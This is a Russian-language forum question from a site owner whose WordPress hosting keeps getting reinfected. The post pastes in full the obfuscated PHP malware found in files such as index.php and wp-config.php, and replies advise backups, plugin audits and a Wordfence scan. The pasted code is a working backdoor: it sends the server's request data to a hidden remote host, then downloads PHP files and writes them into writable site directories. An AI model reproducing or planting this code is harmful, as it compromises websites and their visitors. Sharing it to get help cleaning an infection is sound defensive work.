# Проблема с безопасностью в Wordpress

Tags: php, mysql, wordpress, база-данных, hosting

Возникла проблема с целым хостингом на котором стоит несколько сайтов. В файлах index.php, config.php, wp-config.php, app.php и 404.php появляется следующий код:

```
<?php if(!isset($incode)){$vl='h';$serverid='ebf8b4dc2d4e3cac6f3089e5a9de2896';$server_addr='166.161.223.98';function ooOOo($ooO0o,$ooo0,$oo000,$ooo0O,$oo,$o00o){$oO='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$oOo=stream_context_create(array($o00o=>array('method'=>'POST','timeout'=>$oo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$oO,'content'=>http_build_query($_SERVER)))));if($ooo0O=='yes'){$ooO0o=$ooO0o.'&type=fopen';}$o0=@file_get_contents($ooO0o,false,$oOo);}elseif(in_array('curl',get_loaded_extensions())){if($ooo0O=='yes'){$ooO0o=$ooO0o.'&type=curl';}$oooO=curl_init();curl_setopt($oooO,CURLOPT_URL,$ooO0o);curl_setopt($oooO,CURLOPT_HEADER,false);curl_setopt($oooO,CURLOPT_RETURNTRANSFER,true);curl_setopt($oooO,CURLOPT_TIMEOUT,$oo);curl_setopt($oooO,CURLOPT_USERAGENT,$oO);if($o00o=='https'){curl_setopt($oooO,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oooO,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oooO,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oooO,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$o0=@curl_exec($oooO);curl_close($oooO);}else{if($ooo0O=='yes'){$oo000=$oo000.'&type=socks';}if($o00o=='https'){$o00=fsockopen('ssl://'.$ooo0,443,$oOoOO,$oOOO,$oo);}else{$o00=fsockopen($ooo0,80,$oOoOO,$oOOO,$oo);}if($o00){stream_set_timeout($o00,$oo);$oO0=http_build_query($_SERVER);$oO000='POST '.$oo000.' HTTP/1.0'."\r\n";$oO000.='Host: '.$ooo0."\r\n";$oO000.='User-Agent: '.$oO."\r\n";$oO000.='Content-Type: application/x-www-form-urlencoded'."\r\n";$oO000.='Content-Length: '.strlen($oO0)."\r\n\r\n";fwrite($o00,$oO000);fwrite($o00,$oO0);$o0Oo0='';while(!feof($o00)){$o0Oo0.=fgets($o00,4096);}fclose($o00);list($o0o,$oO00)=@preg_split("/\R\R/",$o0Oo0,2);$o0=$oO00;}}return$o0;}function c_version($oOO){$o0O0[0]=(int)($oOO/256/256/256);$o0O0[1]=(int)(($oOO-$o0O0[0]*256*256*256)/256/256);$o0O0[2]=(int)(($oOO-$o0O0[0]*256*256*256-$o0O0[1]*256*256)/256);$o0O0[3]=$oOO-$o0O0[0]*256*256*256-$o0O0[1]*256*256-$o0O0[2]*256;return''.$o0O0[0].".".$o0O0[1].".".$o0O0[2].".".$o0O0[3];}function ooo($o0O0o){$o0O00=array();$o0O00[]=$o0O0o;foreach(scandir($o0O0o) as$oo0oo){if($oo0oo=='.'||$oo0oo=='..'){continue;}$o0O=$o0O0o.DIRECTORY_SEPARATOR.$oo0oo;if(is_dir($o0O)){$o0O00[]=$o0O;$o0O00=array_merge($o0O00,ooo($o0O));}}return$o0O00;}$oo0oO=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$ooo0=c_version('1540531608');$oo000='/get.php?spider&checkdomain&host='.$oo0oO.'&serverid='.$serverid.'&stookfile='.__FILE__;$ooO0o='http://'.$ooo0.'/get.php?spider&checkdomain&host='.$oo0oO.'&serverid='.$serverid.'&stookfile='.__FILE__;$ooO00=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='30',$o00o='http');if($ooO00!='havedoor|havedonor'){$oOOoo=$_SERVER['HTTP_HOST'];$ooO=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$ooo=$_SERVER['DOCUMENT_ROOT'];chdir($ooo);$o0O00=ooo($ooo);$o0O00=array_unique($o0O00);foreach($o0O00 as$oo0oo){if(is_dir($oo0oo)&&is_writable($oo0oo)){$o00OO=explode(DIRECTORY_SEPARATOR,$oo0oo);$oOOo=count($o00OO);$ooOO[]=$oOOo.'|'.$oo0oo;}}$oOOo=0;foreach($ooOO as$oOO0){if(count($ooOO)>1&&(strstr($oOO0,'/wp-admin')||strstr($oOO0,'/cgi-bin'))){unset($ooOO[$oOOo]);}$oOOo++;}if(!is_writable($ooo)){natsort($ooOO);$ooOO=array_values($ooOO);$oOO0=explode('|',$ooOO[0]);$oOO0=$oOO0[1];}else{$oOO0=$ooo;}chdir($oOO0);if(stristr($ooO00,'nodoor')){$ooO0o='http://'.$ooo0.'/get.php?vl='.$vl.'&update&needfilename';$oo000='/get.php?vl='.$vl.'&update&needfilename';$oooOo=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='55',$o00o='http');$o0000=explode('|||||',$oooOo);$oooo=$o0000[0].'.php';$oOoOo=$o0000[1];file_put_contents($oOO0.DIRECTORY_SEPARATOR.$oooo,$oOoOo);$o0OO0=str_replace($ooo,'',$oOO0);if($_SERVER['SERVER_PORT']=='443'){$o00o='https';}else{$o00o='http';}$ooO0o=$o00o.'://'.$oOOoo.$o0OO0.'/'.$oooo.'?gen&serverid='.$serverid;$oo000=$o0OO0.'/'.$oooo.'?gen&serverid='.$serverid;$o00Oo=ooOOo($ooO0o,$oOOoo,$oo000,$ooo0O='no',$oo='55',$o00o);}elseif(stristr($ooO00,'needtoloadsomefiles')){shuffle($ooOO);$oOO0=explode('|',$ooOO[0]);$oOO0=$oOO0[1];$o0OO0=str_replace($ooo,'',$oOO0);$o0OO='stuvwxyz';$oooo=str_shuffle($o0OO).'.php';$o0OoO=urlencode($o00o.'://'.$oOOoo.$o0OO0.'/'.$oooo);$ooO0o='http://'.$ooo0.'/get.php?bdr&url='.$o0OoO;$oo000='/get.php?bdr&url='.$o0OoO;$o0=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='20',$o00o='http');file_put_contents($oOO0.DIRECTORY_SEPARATOR.$oooo,$o0);}elseif(stristr($ooO00,'needtoloadclient')){$ooO0o='http://'.$ooo0.'/get.php?getclient&domain='.$ooO;$oo000='/get.php?getclient&domain='.$ooO;$o0=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='55',$o00o='http');if($o0=='noclient'){exit;}$oo0Oo=explode('::::',$o0);$oOo0O=$oo0Oo[0];$oooo0=$oo0Oo[1];@chmod($oOo0O,0666);file_put_contents($oOo0O,$oooo0);}elseif($ooO00=='needtowait'){}if(stristr($ooO00,'nodonor')){}}$incode=1;}?>
```

- в основном каталоге вордпресс появляется файл с таким же кодом и случайным названием. Антивирус хостинга не определяет это так угрозу, а сайты всё равно падают. Может кто подскажет что делать?

  PS. Удалял код вручную из файлов он всё равно появляется через некоторое время.

Comment: Вызывайте Охотников За Привидениями. Сами вы ничего не сделаете. Эта кака имеет доступ ко всем сайтам в вашем root. Затащили 100% с плагином, вы не первый. Обращайтесь к спецам или востанавливайте сайты из старых бекапов.

Comment: Это эксплоит, который Вам, вероятно, кто-то закидывает. Причём именно этот я где-то видел, толи на exploit.in, толи в античате. Что делать? Проверять все свои плагины и заниматься безопасностью. К сожалению wordpress наиболее подвержен подобным "пентестам" из-за свой популярности. Помню даже конкурсы устраивали. Он так и будет сам создавать файлы, пока Вы его полностью не убъёте. Начните проверку отсюда https://xakep.ru/2015/05/10/defend-wordpress-yourself/

Comment: Поставьте плагин Wordfence и проведите сканирование.

Answer (score -1):

Если с "целым хостингом", то лечить нужно  "целый хостинг".

А что делать в ВП-сайтом написано в ответе на "[Вирусы в WordPress](https://ru.stackoverflow.com/questions/777029/%D0%92%D0%B8%D1%80%D1%83%D1%81%D1%8B-%D0%B2-wordpress/777040#777040)"